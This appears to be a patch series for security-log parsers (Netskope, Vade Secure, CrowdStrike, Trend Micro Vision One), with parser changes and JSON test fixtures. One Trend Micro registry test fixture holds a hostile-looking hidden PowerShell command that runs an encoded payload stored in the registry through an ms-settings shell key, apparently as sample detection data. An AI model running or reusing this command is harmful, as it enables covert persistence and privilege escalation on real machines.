"lat": 50.0883, + "lon": 14.4124 + }, + "postal_code": "110 00", + "region_name": "Prague", + "timezone": "Europe/Prague" + }, + "ip": "1.2.3.4" + }, + "file": { + "hash": { + "md5": "68b329da9893e34099c7d8ad5cb9c940" + }, + "mime_type": "File Type Not Detected", + "name": "object.txt", + "size": 24 + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 10", + "platform": "windows", + "type": "windows", + "version": "Windows NT 10.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "Remote Access", + "name": "App" + }, + "ccl": "medium" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "hash": [ + "68b329da9893e34099c7d8ad5cb9c940" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "JDOE" + ] + }, + "rule": { + "id": "22222222222222222222222222222222 2024-10-30 13:52:18.401518" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 48.6673, + "lon": 2.3476 + }, + "postal_code": "75001", + "region_name": "\u00cele-de-France", + "timezone": "Europe/Paris" + }, + "ip": "5.6.7.8" + }, + "url": { + "original": "url.app.com/object2.txt", + "path": "url.app.com/object2.txt" + }, + "user": { + "domain": "mail.com", + "email": "JDOE@mail.com", + "name": "JDOE" + }, + "user_agent": { + "name": "CHROME", + "version": "6.0;" + } + } +} \ No newline at end of file diff --git a/Netskope/netskope_events/tests/test_user_alert.json b/Netskope/netskope_events/tests/test_user_alert.json index a882c2ac5..4c435b860 100644 --- a/Netskope/netskope_events/tests/test_user_alert.json +++ b/Netskope/netskope_events/tests/test_user_alert.json @@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"useralert\",\n \"activity\": \"Share\",\n \"alert\": \"yes\",\n \"app\": \"WeTransfer\",\n \"app_session_id\": 1111111111111111111,\n \"appcategory\": \"Cloud Storage\",\n \"browser\": \"Edge\",\n \"browser_session_id\": 2222222222222222222,\n \"browser_version\": \"108.0.1462.54\",\n \"category\": \"Cloud Storage\",\n \"cci\": 58,\n \"ccl\": \"low\",\n \"connection_id\": 3333333333333333333,\n \"count\": 1,\n \"device\": \"Windows Device\",\n \"device_classification\": \"unmanaged\",\n \"dst_country\": \"IE\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 53.3379,\n \"dst_location\": \"Dublin\",\n \"dst_longitude\": -6.2591,\n \"dst_region\": \"Leinster\",\n \"dst_timezone\": \"Europe/Dublin\",\n \"dst_zipcode\": \"D02\",\n \"dstip\": \"108.128.91.183\",\n \"from_user\": \"jane.doe@example.org\",\n \"hostname\": \"TEST-1234\",\n \"managed_app\": \"no\",\n \"managementID\": \"99999999999999999999999999999999\",\n \"netskope_pop\": \"FR-PAR1\",\n \"notify_template\": \"useralert_justify.html\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"Client.exe\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Windows 11\",\n \"os_version\": \"Windows 11\",\n \"page\": \"wetransfer.com/\",\n \"page_site\": \"Web Background\",\n \"policy\": \"DO NOT CHANGE Educate Upload to Non-Corporate Storage\",\n \"policy_id\": \"99999999999999999999999999999999 2022-12-21 14:31:09.981853\",\n \"protocol\": \"HTTPS/2\",\n \"referer\": \"https://wetransfer.com/\",\n \"request_id\": 4444444444444444444,\n \"severity\": \"unknown\",\n \"site\": \"WeTransfer\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 15:52:08 2022\",\n \"src_timezone\": \"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"telemetry_app\": \"\",\n \"timestamp\": 1671634321,\n \"to_user\": \"a@a.fr\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 4444444444444444444,\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"wetransfer.com/api/v4/transfers/email\",\n \"user\": \"john.doe@example.org\",\n \"useragent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"internal_collaborator_count\": 0,\n \"fromlogs\": \"\",\n \"dlp_incident_id\": 0,\n \"owner\": \"\",\n \"dlp_profile\": \"\",\n \"workspace\": \"\",\n \"user_id\": \"\",\n \"userPrincipalName\": \"\",\n \"true_obj_category\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"orignal_file_path\": \"\",\n \"other_categories\": [],\n \"serial\": \"\",\n \"tss_mode\": \"\",\n \"conn_duration\": 0,\n \"from_user_category\": \"\",\n \"md5\": \"\",\n \"data_type\": \"\",\n \"title\": \"\",\n \"log_file_name\": \"\",\n \"dstport\": 0,\n \"exposure\": \"\",\n \"instance_id\": \"\",\n \"audit_category\": \"\",\n \"netskope_activity\": \"\",\n \"file_type\": \"\",\n \"total_collaborator_count\": 0,\n \"file_path\": \"\",\n \"modified\": 0,\n \"dlp_rule_count\": 0,\n \"suppression_end_time\": 0,\n \"CononicalName\": \"\",\n \"alert_type\": \"\",\n \"sanctioned_instance\": \"\",\n \"suppression_start_time\": 0,\n \"dlp_parent_id\": 0,\n \"true_obj_type\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"audit_type\": \"\",\n \"workspace_id\": \"\",\n \"dsthost\": \"\",\n \"web_universal_connector\": \"\",\n \"req_cnt\": 0,\n \"mime_type\": \"\",\n \"suppression_key\": \"\",\n \"scan_type\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"object_id\": \"\",\n \"user_category\": \"\",\n \"dlp_rule\": \"\",\n \"parent_id\": \"\",\n \"sha256\": \"\",\n \"dlp_rule_severity\": \"\",\n \"logintype\": \"\",\n \"org\": \"\",\n \"dlp_unique_count\": 0,\n \"file_size\": 0,\n \"instance\": \"\",\n \"sAMAccountName\": \"\",\n \"resp_cnt\": 0,\n \"universal_connector\": \"\",\n \"numbytes\": 0,\n \"server_bytes\": 0,\n \"channel_id\": \"\",\n \"file_lang\": \"\",\n \"app_activity\": \"\",\n \"appsuite\": \"\",\n \"sessionid\": \"\",\n \"loginurl\": \"\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"custom_connector\": \"\"\n}\n", "event": { - "action": "Share", + "action": "useralert", "category": [ "network" ], From dc3c4ff33c7a2ecedd7e1f28c5662b24f763efa0 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 11:32:02 +0100 Subject: [PATCH 41/84] Improvement: Vade Secure M365 - Add parsed fields --- VadeSecure/vade_secure_m365/_meta/fields.yml | 5 ++ VadeSecure/vade_secure_m365/ingest/parser.yml | 5 ++ .../vade_secure_m365/tests/email_02.json | 61 +++++++++++++++ .../tests/email_with_attachment_02.json | 77 +++++++++++++++++++ 4 files changed, 148 insertions(+) create mode 100644 VadeSecure/vade_secure_m365/tests/email_02.json create mode 100644 VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index 1e4a81657..a3f60b15c 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,6 +58,11 @@ vadesecure.attachments: short: vadesecure.to_header type: array +vadesecure.auth_results_details: + description: Details of security protocols, mostly SPF, DKIM and DMARC. + name: vadesecure.auth_results_details + type: object + vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. name: vadesecure.campaign.actions diff --git a/VadeSecure/vade_secure_m365/ingest/parser.yml b/VadeSecure/vade_secure_m365/ingest/parser.yml index 539de1df4..cbac9cd2d 100644 --- a/VadeSecure/vade_secure_m365/ingest/parser.yml +++ b/VadeSecure/vade_secure_m365/ingest/parser.yml @@ -56,6 +56,7 @@ stages: actions: - name: set set: + vadesecure.auth_results_details: "{{parse_json.message.auth_results_details}}" vadesecure.folder: "{{parse_json.message.folder}}" vadesecure.from_header: "{{parse_json.message.from_header}}" vadesecure.to_header: "{{parse_json.message.to_header}}" @@ -131,3 +132,7 @@ stages: - set: source.ip: "{{parse_json.message.sender_ip}}" filter: "{{parse_json.message.sender_ip| is_ipaddress}}" + + - set: + email.reply_to.address: "{{parse_json.message.reply_to_header}}" + filter: "{{parse_json.message.reply_to_header != ''}}" diff --git a/VadeSecure/vade_secure_m365/tests/email_02.json b/VadeSecure/vade_secure_m365/tests/email_02.json new file mode 100644 index 000000000..7b2c0ae83 --- /dev/null +++ b/VadeSecure/vade_secure_m365/tests/email_02.json @@ -0,0 +1,61 @@ +{ + "input": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [], + "from": { + "address": "jd@doe.fr" + }, + "local_id": "cs72a9b6r0glddhdfh7g", + "message_id": "", + "reply_to": { + "address": "user@company.com" + }, + "subject": "Informations", + "to": { + "address": "alan.smithee@doe.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [], + "auth_results_details": { + "dkim": "none", + "dmarc": "fail", + "spf": "temperror" + }, + "from_header": "John Doe", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan.smithee@doe.fr", + "whitelist": "false" + } + } +} \ No newline at end of file diff --git a/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json new file mode 100644 index 000000000..679e24c56 --- /dev/null +++ b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json @@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"csb6q1pgfisg9knp1l5g\", \"date\": \"2024-10-21T15:02:31.64Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"john.doe@mail.fr\", \"from_header\": \"John DOE \", \"to\": \"alan.smithee@company.fr\", \"to_header\": \"Alan Smithee \", \"subject\": \"Re: Your mail\", \"message_id\": \"\", \"urls\": [{\"url\": \"http://www.company.fr/\"}], \"attachments\": [{\"id\": \"12345678901234567890\", \"filename\": \"image001.jpg\", \"extension\": \"jpg\", \"size\": 5130, \"hashes\": {\"md5\": \"7bc2b146a309acbff2da55e6b4124a82\", \"sha1\": \"299d5bf95adb52e640f9723c5f58b5a8e880be9b\", \"sha256\": \"288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368\", \"sha512\": \"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423\"}}], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 93072, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"fail\", \"spf\": \"temperror\", \"dmarc\": \"none\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [ + { + "file": { + "extension": "jpg", + "hash": { + "md5": "7bc2b146a309acbff2da55e6b4124a82", + "sha1": "299d5bf95adb52e640f9723c5f58b5a8e880be9b", + "sha256": "288093f2981e53222135c94d1d6179a069d6e539daa86f10d65f86958f793368", + "sha512": "7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423" + }, + "name": "image001.jpg", + "size": 5130 + } + } + ], + "from": { + "address": "john.doe@mail.fr" + }, + "local_id": "csb6q1pgfisg9knp1l5g", + "message_id": "", + "subject": "Re: Your mail", + "to": { + "address": "alan.smithee@company.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [ + { + "filename": "image001.jpg", + "id": "12345678901234567890" + } + ], + "auth_results_details": { + "dkim": "fail", + "dmarc": "none", + "spf": "temperror" + }, + "from_header": "John DOE ", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan Smithee ", + "whitelist": "false" + } + } +} \ No newline at end of file From cb5456827e5201fd75229cc4770a445a72738be0 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 11:59:10 +0100 Subject: [PATCH 42/84] CrowdStrike telemetry: fix on parsing error --- CrowdStrike/crowdstrike-telemetry/_meta/fields.yml | 5 ----- CrowdStrike/crowdstrike-telemetry/ingest/parser.yml | 7 ++----- .../crowdstrike-telemetry/tests/telemetry_event_26.json | 5 ++++- 3 files changed, 6 insertions(+), 11 deletions(-) diff --git a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml index 75e1b7434..a59b68006 100644 --- a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml +++ b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml @@ -1,8 +1,3 @@ -crowdstrike.base_filename: - description: Base Filename - name: crowdstrike.base_filename - type: keyword - crowdstrike.customer_id: description: Customer ID (cid) name: crowdstrike.customer_id diff --git a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml index 03e9819e7..5d0069c0a 100644 --- a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml +++ b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml @@ -53,9 +53,6 @@ stages: "host.domain": "{{parsed_event.message.MachineDomain}}" "host.mac": "{{parsed_event.message.MAC}}" - - set: - crowdstrike.base_filename: "{{parsed_event.message.ContextBaseFileName}}" - set_registry_fields: actions: - set: @@ -180,9 +177,9 @@ stages: - set: "event.action": "{{parsed_event.message.event_simpleName}}" - "process.command_line": "{{parsed_event.message.CommandLine}}" + "process.command_line": "{{parsed_event.message.CommandLine or parsed_event.message.ContextBaseFileName}}" "process.executable": "{{parsed_event.message.ImageFileName}}" - "process.name": "{{parsed_event.message.ImageFileName | basename}}" + "process.name": "{{parsed_event.message.ImageFileName | basename or parsed_event.message.ContextBaseFileName}}" "process.thread.id": "{{parsed_event.message.SourceThreadId | int}}" "process.parent.name": "{{parsed_event.message.ParentBaseFileName}}" "process.parent.pid": "{{parsed_event.message.ParentProcessId}}" diff --git a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json index 1e7368eee..01e9a933f 100644 --- a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json +++ b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json @@ -18,7 +18,6 @@ "id": "111111111111111" }, "crowdstrike": { - "base_filename": "svchost.exe", "customer_id": "222222222222222222222" }, "file": { @@ -34,6 +33,10 @@ "platform": "win" } }, + "process": { + "command_line": "svchost.exe", + "name": "svchost.exe" + }, "related": { "ip": [ "4.3.2.1" From fa87d4f91aea0f4fe26bdcaa466793c87268fddf Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 20 Nov 2024 10:51:50 +0200 Subject: [PATCH 43/84] Smart descs --- .../trend-micro-vision-one/_meta/smart-descriptions.json | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json index 7a3ee9d51..742eee7cc 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json +++ b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json @@ -1,4 +1,8 @@ [ + { + "value": "{event.reason} on {host.ip}", + "conditions": [{ "field": "event.reason" }, { "field": "host.ip" }] + }, { "value": "{event.reason}", "conditions": [{ "field": "event.reason" }] From 7b8703b20c6bbccf5d801d9dda0f06c9b05431ce Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 20 Nov 2024 12:24:27 +0200 Subject: [PATCH 44/84] Fixes and improvements --- .../trend-micro-vision-one/ingest/parser.yml | 22 +++++++++++-------- .../tests/test_registry.json | 3 ++- 2 files changed, 15 insertions(+), 10 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index be400399d..a13ee54b2 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -39,14 +39,19 @@ stages: event.url: "{{parsed_event.message.model.workbenchLink}}" + - set: process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" + process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" + - set: registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}" registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" - registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}" - registry.path: > {%- set path = [] -%} {%- for indicator in parsed_event.message.indicators -%} @@ -57,22 +62,21 @@ stages: {%- endfor -%} {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} - # @todo should be along with registry.data.type to REG_SZ registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}" + - set: + registry.data.type: "REG_SZ" + filter: "{{final.registry.data.strings != null }}" + + - set: file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}" file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}" file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}" file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}" - process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" - process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" - process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" - process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" - process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" - user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}" + - set: trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}" trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index f9873edf1..3c32834ae 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -41,7 +41,8 @@ }, "registry": { "data": { - "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x" + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x", + "type": "REG_SZ" }, "hive": "hkcr", "key": "ms-settings\\shell\\open\\command", From bc86ba96e28498fa916cca216790f5b8094d6d16 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 20 Nov 2024 15:51:21 +0200 Subject: [PATCH 45/84] Add test --- .../tests/test_internal_network_scanner.json | 74 +++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json new file mode 100644 index 000000000..e6bcf0088 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json @@ -0,0 +1,74 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", 